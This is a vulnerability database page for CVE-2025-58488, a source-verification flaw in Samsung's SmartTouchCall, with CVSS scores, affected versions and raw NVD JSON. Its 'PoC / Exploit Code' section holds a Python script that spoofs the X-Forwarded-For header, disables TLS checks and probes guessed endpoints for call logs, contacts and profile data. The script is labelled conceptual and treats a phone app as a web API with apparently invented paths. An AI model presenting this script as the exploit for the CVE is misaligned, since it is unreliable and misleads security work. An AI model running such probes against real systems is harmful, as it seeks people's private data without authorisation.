Security Vulnerability Report
中文
CVE-2025-58488 CVSS 4.5 MEDIUM

CVE-2025-58488

Published: 2025-12-02 02:15:49
Last Modified: 2026-01-08 16:33:22

Description

Improper verification of source of a communication channel in SmartTouchCall prior to version 1.0.1.1 allows remote attackers to access sensitive information. User interaction is required for triggering this vulnerability.

CVSS Details

CVSS Score
4.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:samsung:smart_touch_call:1.0.1.1:*:*:*:*:*:*:* - VULNERABLE
SmartTouchCall < 1.0.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58488 PoC - SmartTouchCall Source Verification Bypass # This is a conceptual PoC demonstrating the vulnerability # Note: Actual exploitation requires specific conditions and user interaction import requests import json def check_vulnerability(target_ip, target_port=443): """ Check if SmartTouchCall is vulnerable to CVE-2025-58488 """ print(f"[*] Scanning target: {target_ip}:{target_port}") print(f"[*] CVE-2025-58488: SmartTouchCall Source Verification Issue") # Step 1: Identify SmartTouchCall service service_url = f"https://{target_ip}:{target_port}/SmartTouchCall/api" try: # Step 2: Send crafted request with spoofed source headers = { 'User-Agent': 'SmartTouchCall-Client/1.0', 'X-Forwarded-For': '127.0.0.1', # Spoofed source 'Content-Type': 'application/json' } # Step 3: Attempt to access sensitive endpoints sensitive_endpoints = [ '/api/user/profile', '/api/call/logs', '/api/contacts', '/api/settings' ] for endpoint in sensitive_endpoints: response = requests.get( service_url + endpoint, headers=headers, verify=False, timeout=10 ) if response.status_code == 200: print(f"[!] Potential vulnerability: {endpoint} accessible") print(f"[+] Response: {response.text[:200]}...") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print(f"[*] Note: This PoC requires user interaction and proper context") if __name__ == "__main__": print("CVE-2025-58488 Verification PoC") print("For authorized security testing only") # check_vulnerability('target_ip')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58488", "sourceIdentifier": "[email protected]", "published": "2025-12-02T02:15:48.907", "lastModified": "2026-01-08T16:33:21.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper verification of source of a communication channel in SmartTouchCall prior to version 1.0.1.1 allows remote attackers to access sensitive information. User interaction is required for triggering this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:smart_touch_call:1.0.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "5D4B6A0C-E0C2-4089-B4F8-343E59DE435C"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}